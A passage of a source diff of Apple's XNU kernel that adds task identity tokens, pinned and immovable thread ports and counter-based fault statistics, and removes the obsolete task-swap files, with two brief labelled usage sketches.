+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap;           /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt;             /* a send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd;                     /* yet another send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control;   /* send right for debugmode communications */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access;       /* and another send right */
+       struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume;                 /* a receive right to resume this task */
        struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_registered") itk_registered[TASK_PORT_REGISTER_MAX];
        /* all send rights */
+       ipc_port_t * XNU_PTRAUTH_SIGNED_PTR("task.itk_dyld_notify") itk_dyld_notify; /* lazy send rights array of size DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT */
 
        struct ipc_space * XNU_PTRAUTH_SIGNED_PTR("task.itk_space") itk_space;
 
@@ -233,7 +237,7 @@ struct task {
 
        MACHINE_TASK
 
-       integer_t faults;              /* faults counter */
+       counter_t faults;              /* faults counter */
        integer_t decompressions;      /* decompression counter */
        integer_t pageins;             /* pageins counter */
        integer_t cow_faults;          /* copy on write fault counter */
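
For reference, a minimal sketch (not from the commit) of the counter lifecycle that replaces the plain integer above; the calls mirror those used elsewhere in this diff (counter_alloc/add/load/free from kern/counter.h), and example_faults is hypothetical:

static counter_t example_faults;

static void
example_counter_lifecycle(void)
{
	counter_alloc(&example_faults);                      /* at task creation */
	counter_add(&example_faults, 1);                     /* on each page fault */
	uint64_t snapshot = counter_load(&example_faults);   /* e.g. for task_info() */
	(void)snapshot;
	counter_free(&example_faults);                       /* at task teardown */
}
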
@@ -478,6 +482,8 @@ struct task {
 #if CONFIG_PHYS_WRITE_ACCT
        uint64_t        task_fs_metadata_writes;
 #endif /* CONFIG_PHYS_WRITE_ACCT */
+       uint32_t task_shared_region_slide;   /* cached here to avoid locking during telemetry */
+       uuid_t   task_shared_region_uuid;
 };
 
 /*
@@ -595,6 +601,14 @@ task_watchport_elem_deallocate(
 extern boolean_t
 task_has_watchports(task_t task);
 
+void
+task_dyld_process_info_update_helper(
+       task_t                  task,
+       size_t                  active_count,
+       vm_map_address_t        magic_addr,
+       ipc_port_t             *release_ports,
+       size_t                  release_count);
+
 #else   /* MACH_KERNEL_PRIVATE */
 
 __BEGIN_DECLS
@@ -1047,6 +1061,7 @@ extern boolean_t get_task_frozen(task_t);
 
 /* Convert from a task to a port */
 extern ipc_port_t convert_task_to_port(task_t);
+extern ipc_port_t convert_task_to_port_pinned(task_t);
 extern ipc_port_t convert_task_name_to_port(task_name_t);
 extern ipc_port_t convert_task_inspect_to_port(task_inspect_t);
 extern ipc_port_t convert_task_read_to_port(task_read_t);
diff --git a/osfmk/kern/task_ident.c b/osfmk/kern/task_ident.c
new file mode 100644 (file)
index 0000000..71802c5
--- /dev/null
@@ -0,0 +1,250 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <os/refcnt.h>
+#include <kern/ipc_kobject.h>
+#include <mach/mach_types.h>
+#include <mach/task.h>
+#include <mach/notify.h>
+#include <mach/kern_return.h>
+#include <security/mac_mach_internal.h>
+#include <kern/task_ident.h>
+
+struct proc_ident {
+       uint64_t        p_uniqueid;
+       pid_t           p_pid;
+       int             p_idversion;
+};
+
+extern void* proc_find_ident(struct proc_ident const *i);
+extern int proc_rele(void* p);
+extern task_t proc_task(void* p);
+extern struct proc_ident proc_ident(void* p);
+extern kern_return_t task_conversion_eval(task_t caller, task_t victim);
+
+struct task_id_token {
+       struct proc_ident ident;
+       ipc_port_t        port;
+       os_refcnt_t       tidt_refs;
+};
+
+static ZONE_DECLARE(task_id_token_zone, "task_id_token",
+    sizeof(struct task_id_token), ZC_ZFREE_CLEARMEM);
+
+static void
+tidt_reference(task_id_token_t token)
+{
+       if (token == TASK_ID_TOKEN_NULL) {
+               return;
+       }
+       os_ref_retain(&token->tidt_refs);
+}
+
+static void
+tidt_release(task_id_token_t token)
+{
+       ipc_port_t port;
+
+       if (token == TASK_ID_TOKEN_NULL) {
+               return;
+       }
+
+       if (os_ref_release(&token->tidt_refs) > 0) {
+               return;
+       }
+
+       /* last ref */
+       port = token->port;
+
+       require_ip_active(port);
+       assert(!port->ip_srights);
+       ipc_port_dealloc_kernel(port);
+
+       zfree(task_id_token_zone, token);
+}
+
+void
+task_id_token_release(task_id_token_t token)
+{
+       tidt_release(token);
+}
+
+void
+task_id_token_notify(mach_msg_header_t *msg)
+{
+       assert(msg->msgh_id == MACH_NOTIFY_NO_SENDERS);
+
+       mach_no_senders_notification_t *not = (mach_no_senders_notification_t *)msg;
+       ipc_port_t port = not->not_header.msgh_remote_port;
+       task_id_token_t token = ip_get_kobject(port);
+
+       require_ip_active(port);
+       assert(IKOT_TASK_ID_TOKEN == ip_kotype(port));
+       assert(port->ip_srights == 0);
+
+       tidt_release(token); /* consumes ref given by notification */
+}
+
+kern_return_t
+task_create_identity_token(
+       task_t task,
+       task_id_token_t *tokenp)
+{
+       task_id_token_t token;
+
+       if (task == TASK_NULL || task == kernel_task) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       token = zalloc_flags(task_id_token_zone, Z_ZERO | Z_WAITOK | Z_NOFAIL);
+
+       task_lock(task);
+       if (task->bsd_info) {
+               token->port = IP_NULL;
+               token->ident = proc_ident(task->bsd_info);
+               /* this reference will be donated to no-senders notification */
+               os_ref_init_count(&token->tidt_refs, NULL, 1);
+       } else {
+               task_unlock(task);
+               zfree(task_id_token_zone, token);
+               return KERN_INVALID_ARGUMENT;
+       }
+       task_unlock(task);
+
+       *tokenp = token;
+
+       return KERN_SUCCESS;
+}
+
+kern_return_t
+task_identity_token_get_task_port(
+       task_id_token_t token,
+       task_flavor_t  flavor,
+       ipc_port_t    *portp)
+{
+       int which;
+       task_t task;
+       kern_return_t kr;
+
+       if (token == TASK_ID_TOKEN_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       switch (flavor) {
+       case TASK_FLAVOR_NAME:
+               which = TASK_NAME_PORT;
+               break;
+       case TASK_FLAVOR_INSPECT:
+               which = TASK_INSPECT_PORT;
+               break;
+       case TASK_FLAVOR_READ:
+               which = TASK_READ_PORT;
+               break;
+       case TASK_FLAVOR_CONTROL:
+               which = TASK_KERNEL_PORT;
+               break;
+       default:
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       void* p = proc_find_ident(&token->ident);
+       if (p == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+       task = proc_task(p);
+       task_reference(task);
+       proc_rele(p);
+
+       if (task == TASK_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if (flavor == TASK_FLAVOR_CONTROL && task == current_task()) {
+               *portp = convert_task_to_port_pinned(task); /* consumes task ref */
+               return KERN_SUCCESS;
+       }
+       if (flavor <= TASK_FLAVOR_INSPECT && task_conversion_eval(current_task(), task)) {
+               task_deallocate(task);
+               return KERN_INVALID_ARGUMENT;
+       }
+
+#if CONFIG_MACF
+       if (task != current_task()) {
+               if (mac_task_check_task_id_token_get_task(task, flavor)) {
+                       task_deallocate(task);
+                       return KERN_DENIED;
+               }
+       }
+#endif
+
+       kr = task_get_special_port(task, which, portp);
+       task_deallocate(task);
+       return kr;
+}
+
+/* Produces token ref */
+task_id_token_t
+convert_port_to_task_id_token(
+       ipc_port_t              port)
+{
+       task_id_token_t token = TASK_ID_TOKEN_NULL;
+
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               if (ip_active(port)) {
+                       if (ip_kotype(port) == IKOT_TASK_ID_TOKEN) {
+                               token = (task_id_token_t)ip_get_kobject(port);
+
+                               zone_require(task_id_token_zone, token);
+                               tidt_reference(token);
+                       }
+               }
+               ip_unlock(port);
+       }
+       return token;
+}
+
+/* Consumes token ref */
+ipc_port_t
+convert_task_id_token_to_port(
+       task_id_token_t token)
+{
+       boolean_t kr;
+
+       if (token == TASK_ID_TOKEN_NULL) {
+               return IP_NULL;
+       }
+
+       zone_require(task_id_token_zone, token);
+
+       kr = ipc_kobject_make_send_lazy_alloc_port(&token->port,
+           (ipc_kobject_t) token, IKOT_TASK_ID_TOKEN, IPC_KOBJECT_ALLOC_NONE, false, 0);
+       assert(kr == TRUE); /* no-senders notification is armed, consumes token ref */
+
+       return token->port;
+}
diff --git a/osfmk/kern/task_ident.h b/osfmk/kern/task_ident.h
new file mode 100644 (file)
index 0000000..5d3bee1
--- /dev/null
@@ -0,0 +1,55 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+/*
+ *
+ * A task identity token represents the identity of a mach task without carrying task
+ * access capabilities. In applicable scenarios, task identity token can be moved between
+ * tasks and be upgraded to desired level of task port flavor (namely, task name port,
+ * inspect port, read port or control port) upon use.
+ *
+ */
+
+#ifndef _KERN_TASK_IDENT_H
+#define _KERN_TASK_IDENT_H
+
+#if XNU_KERNEL_PRIVATE
+
+#include <kern/kern_types.h>
+#include <mach/mach_types.h>
+
+void task_id_token_notify(mach_msg_header_t *msg);
+void task_id_token_release(task_id_token_t token);
+
+ipc_port_t convert_task_id_token_to_port(task_id_token_t token);
+
+task_id_token_t convert_port_to_task_id_token(ipc_port_t port);
+
+#endif /* XNU_KERNEL_PRIVATE */
+
+#endif /* _KERN_TASK_IDENT_H */
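
A hedged kernel-side sketch (not in the commit) of the identity-token round trip described above; token_roundtrip is hypothetical and the create/get routines are assumed to carry their MIG-generated prototypes:

static kern_return_t
token_roundtrip(task_t task, ipc_port_t *read_port)
{
	task_id_token_t token;
	kern_return_t kr;

	kr = task_create_identity_token(task, &token);
	if (kr != KERN_SUCCESS) {
		return kr;
	}
	/* Redeem the identity for a TASK_FLAVOR_READ port; policy checks
	 * (task_conversion_eval, MAC hooks) run at redemption time. */
	kr = task_identity_token_get_task_port(token, TASK_FLAVOR_READ, read_port);
	task_id_token_release(token);
	return kr;
}
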
index 4423fd07758a5edf93c75cfaf8ef854eff49fcd9..b9664280336530631e13311409985d394a1134b0 100644 (file)
@@ -3177,10 +3177,9 @@ task_removewatchers(task_t task)
        queue_head_t queue;
        task_watch_t *twp;
 
-       queue_init(&queue);
-
        task_watch_lock();
-       movqueue(&queue, &task->task_watchers);
+       queue_new_head(&task->task_watchers, &queue, task_watch_t *, tw_links);
+       queue_init(&task->task_watchers);
 
        queue_iterate(&queue, twp, task_watch_t *, tw_links) {
                /*
@@ -3193,7 +3192,8 @@ task_removewatchers(task_t task)
        task->num_taskwatchers = 0;
        task_watch_unlock();
 
-       while ((twp = qe_dequeue_head(&task->task_watchers, task_watch_t, tw_links)) != NULL) {
+       while (!queue_empty(&queue)) {
+               queue_remove_first(&queue, twp, task_watch_t *, tw_links);
                /* remove thread and network bg */
                set_thread_appbg(twp->tw_thread, 0, twp->tw_importance);
                thread_deallocate(twp->tw_thread);
diff --git a/osfmk/kern/task_swap.c b/osfmk/kern/task_swap.c
deleted file mode 100644 (file)
index 42a7318..0000000
+++ /dev/null
@@ -1,76 +0,0 @@
-/*
- * Copyright (c) 2000-2004 Apple Computer, Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- *             File:   kern/task_swap.c
- *
- *     Task residency management primitives implementation.
- */
-#include <mach_assert.h>
-#include <task_swapper.h>
-
-#include <kern/spl.h>
-#include <kern/queue.h>
-#include <kern/host.h>
-#include <kern/task.h>
-#include <kern/task_swap.h>
-#include <kern/thread.h>
-#include <kern/host_statistics.h>
-#include <kern/misc_protos.h>
-#include <kern/assert.h>
-#include <mach/policy.h>
-
-#include <ipc/ipc_port.h>       /* We use something from in here */
-
-/*
- *     task_swappable: [exported]
- *
- *     Make a task swappable or non-swappable. If made non-swappable,
- *     it will be swapped in.
- */
-kern_return_t
-task_swappable(
-       host_priv_t host_priv,
-       task_t task,
-       __unused boolean_t make_swappable)
-{
-       if (host_priv == HOST_PRIV_NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
-
-       if (task == TASK_NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
-
-       /*
-        * We don't support swapping, this call is purely advisory.
-        */
-       return KERN_SUCCESS;
-}
diff --git a/osfmk/kern/task_swap.h b/osfmk/kern/task_swap.h
deleted file mode 100644 (file)
index 5972ca3..0000000
+++ /dev/null
@@ -1,135 +0,0 @@
-/*
- * Copyright (c) 2000 Apple Computer, Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- * HISTORY
- *
- * Revision 1.1.1.1  1998/09/22 21:05:32  wsanchez
- * Import of Mac OS X kernel (~semeria)
- *
- * Revision 1.1.1.1  1998/03/07 02:25:56  wsanchez
- * Import of OSF Mach kernel (~mburg)
- *
- * Revision 1.1.4.1  1995/04/07  19:02:38  barbou
- *      Merged into mainline.
- *      [95/03/09            barbou]
- *
- * Revision 1.1.2.2  1995/02/13  15:35:45  barbou
- *      Merged/ported to MK6.
- *
- * Revision 1.1.1.3  94/08/12  15:44:39  barbou
- *      VM Merge - Task Swapper.
- *
- *      Changed host_priv_t into host_t.
- *      [94/07/28            barbou]
- *
- * Revision 1.1.1.2  1994/07/28  15:33:46  barbou
- *      Copied from IK.
- *
- * Revision 3.0.3.2  1994/01/20  19:53:01  chasb
- *      Remove excessively restrictive copyright notice
- *      [1994/01/20  17:50:40  chasb]
- *
- * Revision 3.0.3.1  1993/12/20  21:06:49  gupta
- *      Expanded C O P Y R I G H T
- *      [1993/12/17  22:19:22  gupta]
- *
- * Revision 3.0  1992/12/31  22:08:24  ede
- *      Initial revision for OSF/1 R1.3
- *
- * Revision 1.1.4.5  1992/03/16  18:02:52  gmf
- *      Add TASK_SW_ELIGIBLE flag to swap_flags; prototype
- *      task_swapout_eligible, task_swapout_ineligible.
- *      [1992/02/12  22:01:48  gmf]
- *
- * Revision 1.1.4.4  1992/01/22  22:14:13  gmf
- *      Change prototype for task_swappable() to use host_priv_t
- *      instead of host_t.
- *      [1992/01/17  17:48:13  gmf]
- *
- * Revision 1.1.4.3  1991/12/10  17:20:55  gmf
- *      Add extern declaration for new thread.
- *      Changed TASK_SW_WAIT flag to TASK_SW_WANT_IN.
- *      [1991/12/10  16:19:10  gmf]
- *
- * Revision 1.1.4.2  1991/11/21  21:48:35  mmp
- *      initial task swapping code
- *      [1991/11/21  21:01:37  mmp]
- *
- * $EndLog$
- */
-
-/*
- *             File:   kern/task_swap.h
- *
- *     Task residency management primitives declarations.
- */
-
-#ifndef _KERN_TASK_SWAP_H_
-#define _KERN_TASK_SWAP_H_
-
-#include <kern/host.h>
-
-/*
- *     swap states
- */
-#define TASK_SW_UNSWAPPABLE     1       /* not swappable */
-#define TASK_SW_IN              2       /* swapped in (resident) */
-#define TASK_SW_OUT             3       /* swapped out (non-resident) */
-#define TASK_SW_COMING_IN       4       /* about to be swapped in */
-#define TASK_SW_GOING_OUT       5       /* being swapped out */
-
-/*
- *     swap flags
- */
-#define TASK_SW_MAKE_UNSWAPPABLE        0x01    /* make it unswappable */
-#define TASK_SW_WANT_IN                 0x02    /* sleeping on state */
-#define TASK_SW_ELIGIBLE                0x04    /* eligible for swapping */
-
-/*
- * exported routines
- */
-extern void task_swapper_init(void);
-extern kern_return_t task_swapin(
-       task_t,                                 /* task */
-       boolean_t);                             /* make_unswappable */
-extern kern_return_t task_swapout(task_t /* task */);
-extern void task_swapper(void);
-extern void task_swap_swapout_thread(void);
-extern void compute_vm_averages(void);
-extern kern_return_t task_swappable(
-       host_priv_t,                            /* host */
-       task_t,                                 /* task */
-       boolean_t);                             /* swappable */
-extern void task_swapout_eligible(task_t /* task */);
-extern void task_swapout_ineligible(task_t /* task */);
-extern void swapout_ast(void);
-
-#endif  /* _KERN_TASK_SWAP_H_ */
index b777052d4afb62eb12fd4d886a538af16e7b6975..dd71cf230b8a943d4f03feabfbbecf2046d71e0e 100644 (file)
@@ -495,31 +495,6 @@ telemetry_take_sample(thread_t thread, uint8_t microsnapshot_flags, struct micro
        }
        bool user64_va = task_has_64Bit_addr(task);
 
-       /*
-        * Find the actual [slid] address of the shared cache's UUID, and copy it in from userland.
-        */
-       int shared_cache_uuid_valid = 0;
-       uint64_t shared_cache_base_address = 0;
-       struct _dyld_cache_header shared_cache_header = {};
-       uint64_t shared_cache_slide = 0;
-
-       /*
-        * Don't copy in the entire shared cache header; we only need the UUID. Calculate the
-        * offset of that one field.
-        */
-       int sc_header_uuid_offset = (char *)&shared_cache_header.uuid - (char *)&shared_cache_header;
-       vm_shared_region_t sr = vm_shared_region_get(task);
-       if (sr != NULL) {
-               if ((vm_shared_region_start_address(sr, &shared_cache_base_address) == KERN_SUCCESS) &&
-                   (copyin(shared_cache_base_address + sc_header_uuid_offset, (char *)&shared_cache_header.uuid,
-                   sizeof(shared_cache_header.uuid)) == 0)) {
-                       shared_cache_uuid_valid = 1;
-                       shared_cache_slide = sr->sr_slide;
-               }
-               // vm_shared_region_get() gave us a reference on the shared region.
-               vm_shared_region_deallocate(sr);
-       }
-
        /*
         * Retrieve the array of UUID's for binaries used by this task.
         * We reach down into DYLD's data structures to find the array.
@@ -670,7 +645,7 @@ copytobuffer:
        tsnap->system_time_in_terminated_threads = task->total_system_time;
        tsnap->suspend_count = task->suspend_count;
        tsnap->task_size = (typeof(tsnap->task_size))(get_task_phys_footprint(task) / PAGE_SIZE);
-       tsnap->faults = task->faults;
+       tsnap->faults = counter_load(&task->faults);
        tsnap->pageins = task->pageins;
        tsnap->cow_faults = task->cow_faults;
        /*
@@ -713,9 +688,11 @@ copytobuffer:
                tsnap->ss_flags |= kUser64_p;
        }
 
-       if (shared_cache_uuid_valid) {
-               tsnap->shared_cache_slide = shared_cache_slide;
-               bcopy(shared_cache_header.uuid, tsnap->shared_cache_identifier, sizeof(shared_cache_header.uuid));
+
+       if (task->task_shared_region_slide != -1) {
+               tsnap->shared_cache_slide = task->task_shared_region_slide;
+               bcopy(task->task_shared_region_uuid, tsnap->shared_cache_identifier,
+                   sizeof(task->task_shared_region_uuid));
        }
 
        current_buffer->current_position += sizeof(struct task_snapshot);
index 0c7bbc603640d22ceb122735ec8443b7c199a3de..08740e361f9db96d06522233a66671b226f71f9b 100644 (file)
@@ -97,7 +97,6 @@
 #include <kern/kern_types.h>
 #include <kern/kalloc.h>
 #include <kern/cpu_data.h>
-#include <kern/counters.h>
 #include <kern/extmod_statistics.h>
 #include <kern/ipc_mig.h>
 #include <kern/ipc_tt.h>
@@ -343,7 +342,7 @@ thread_corpse_continue(void)
 {
        thread_t thread = current_thread();
 
-       thread_terminate_internal(thread);
+       thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
 
        /*
         * Handle the thread termination directly
@@ -708,6 +707,12 @@ thread_deallocate_complete(
        thread->thread_magic = 0;
 #endif /* MACH_ASSERT */
 
+       lck_mtx_lock(&tasks_threads_lock);
+       assert(terminated_threads_count > 0);
+       queue_remove(&terminated_threads, thread, thread_t, threads);
+       terminated_threads_count--;
+       lck_mtx_unlock(&tasks_threads_lock);
+
        zfree(thread_zone, thread);
 }
 
@@ -899,6 +904,8 @@ thread_terminate_queue_invoke(mpsc_queue_chain_t e,
        lck_mtx_lock(&tasks_threads_lock);
        queue_remove(&threads, thread, thread_t, threads);
        threads_count--;
+       queue_enter(&terminated_threads, thread, thread_t, threads);
+       terminated_threads_count++;
        lck_mtx_unlock(&tasks_threads_lock);
 
        thread_deallocate(thread);
@@ -1050,10 +1057,14 @@ thread_daemon_init(void)
        }
 }
 
-#define TH_OPTION_NONE          0x00
-#define TH_OPTION_NOCRED        0x01
-#define TH_OPTION_NOSUSP        0x02
-#define TH_OPTION_WORKQ         0x04
+__options_decl(thread_create_internal_options_t, uint32_t, {
+       TH_OPTION_NONE          = 0x00,
+       TH_OPTION_NOCRED        = 0x01,
+       TH_OPTION_NOSUSP        = 0x02,
+       TH_OPTION_WORKQ         = 0x04,
+       TH_OPTION_IMMOVABLE     = 0x08,
+       TH_OPTION_PINNED        = 0x10,
+});
 
 /*
  * Create a new thread.
@@ -1065,13 +1076,14 @@ static kern_return_t
 thread_create_internal(
        task_t                                  parent_task,
        integer_t                               priority,
-       thread_continue_t               continuation,
+       thread_continue_t                       continuation,
        void                                    *parameter,
-       int                                             options,
+       thread_create_internal_options_t        options,
        thread_t                                *out_thread)
 {
        thread_t                                new_thread;
-       static thread_t                 first_thread;
+       static thread_t                         first_thread;
+       ipc_thread_init_options_t init_options = IPC_THREAD_INIT_NONE;
 
        /*
         *      Allocate a thread and initialize static fields
@@ -1089,6 +1101,14 @@ thread_create_internal(
                init_thread_from_template(new_thread);
        }
 
+       if (options & TH_OPTION_PINNED) {
+               init_options |= IPC_THREAD_INIT_PINNED;
+       }
+
+       if (options & TH_OPTION_IMMOVABLE) {
+               init_options |= IPC_THREAD_INIT_IMMOVABLE;
+       }
+
        os_ref_init_count(&new_thread->ref_count, &thread_refgrp, 2);
 #if DEBUG || DEVELOPMENT
        queue_init(&new_thread->t_temp_alloc_list);
@@ -1132,7 +1152,7 @@ thread_create_internal(
 
        lck_mtx_init(&new_thread->mutex, &thread_lck_grp, LCK_ATTR_NULL);
 
-       ipc_thread_init(new_thread);
+       ipc_thread_init(new_thread, init_options);
 
        new_thread->continuation = continuation;
        new_thread->parameter = parameter;
@@ -1363,14 +1383,15 @@ thread_create_internal(
 }
 
 static kern_return_t
-thread_create_internal2(
-       task_t                          task,
-       thread_t                        *new_thread,
-       boolean_t                       from_user,
-       thread_continue_t               continuation)
+thread_create_with_options_internal(
+       task_t                            task,
+       thread_t                          *new_thread,
+       boolean_t                         from_user,
+       thread_create_internal_options_t  options,
+       thread_continue_t                 continuation)
 {
        kern_return_t           result;
-       thread_t                        thread;
+       thread_t                thread;
 
        if (task == TASK_NULL || task == kernel_task) {
                return KERN_INVALID_ARGUMENT;
@@ -1383,7 +1404,7 @@ thread_create_internal2(
        }
 #endif
 
-       result = thread_create_internal(task, -1, continuation, NULL, TH_OPTION_NONE, &thread);
+       result = thread_create_internal(task, -1, continuation, NULL, options, &thread);
        if (result != KERN_SUCCESS) {
                return result;
        }
@@ -1417,7 +1438,30 @@ thread_create(
        task_t                          task,
        thread_t                        *new_thread)
 {
-       return thread_create_internal2(task, new_thread, FALSE, (thread_continue_t)thread_bootstrap_return);
+       return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE,
+                  (thread_continue_t)thread_bootstrap_return);
+}
+
+/*
+ * Create a thread that has its itk_self pinned
+ * Deprecated; should be cleaned up once rdar://70892168 lands
+ */
+kern_return_t
+thread_create_pinned(
+       task_t                          task,
+       thread_t                        *new_thread)
+{
+       return thread_create_with_options_internal(task, new_thread, FALSE,
+                  TH_OPTION_PINNED | TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return);
+}
+
+kern_return_t
+thread_create_immovable(
+       task_t                          task,
+       thread_t                        *new_thread)
+{
+       return thread_create_with_options_internal(task, new_thread, FALSE,
+                  TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return);
 }
 
 kern_return_t
@@ -1425,7 +1469,8 @@ thread_create_from_user(
        task_t                          task,
        thread_t                        *new_thread)
 {
-       return thread_create_internal2(task, new_thread, TRUE, (thread_continue_t)thread_bootstrap_return);
+       return thread_create_with_options_internal(task, new_thread, TRUE, TH_OPTION_NONE,
+                  (thread_continue_t)thread_bootstrap_return);
 }
 
 kern_return_t
@@ -1434,7 +1479,7 @@ thread_create_with_continuation(
        thread_t                        *new_thread,
        thread_continue_t               continuation)
 {
-       return thread_create_internal2(task, new_thread, FALSE, continuation);
+       return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE, continuation);
 }
 
 /*
@@ -1487,13 +1532,24 @@ thread_create_waiting_internal(
 
 kern_return_t
 thread_create_waiting(
-       task_t                  task,
-       thread_continue_t       continuation,
-       event_t                 event,
-       thread_t                *new_thread)
+       task_t                          task,
+       thread_continue_t               continuation,
+       event_t                         event,
+       th_create_waiting_options_t     options,
+       thread_t                        *new_thread)
 {
+       thread_create_internal_options_t ci_options = TH_OPTION_NONE;
+
+       assert((options & ~TH_CREATE_WAITING_OPTION_MASK) == 0);
+       if (options & TH_CREATE_WAITING_OPTION_PINNED) {
+               ci_options |= TH_OPTION_PINNED;
+       }
+       if (options & TH_CREATE_WAITING_OPTION_IMMOVABLE) {
+               ci_options |= TH_OPTION_IMMOVABLE;
+       }
+
        return thread_create_waiting_internal(task, continuation, event,
-                  kThreadWaitNone, TH_OPTION_NONE, new_thread);
+                  kThreadWaitNone, ci_options, new_thread);
 }
 
 
@@ -1605,7 +1661,13 @@ thread_create_workq_waiting(
        thread_continue_t   continuation,
        thread_t            *new_thread)
 {
-       int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ;
+       /*
+        * Create the thread, but don't pin the control port just yet: if someone
+        * calls task_threads() and deallocates the pinned port before the kernel
+        * copyout happens, the result is a pinned-port guard exception. Instead,
+        * pin the port and make it immovable atomically at copyout time, in
+        * workq_setup_and_run().
+        */
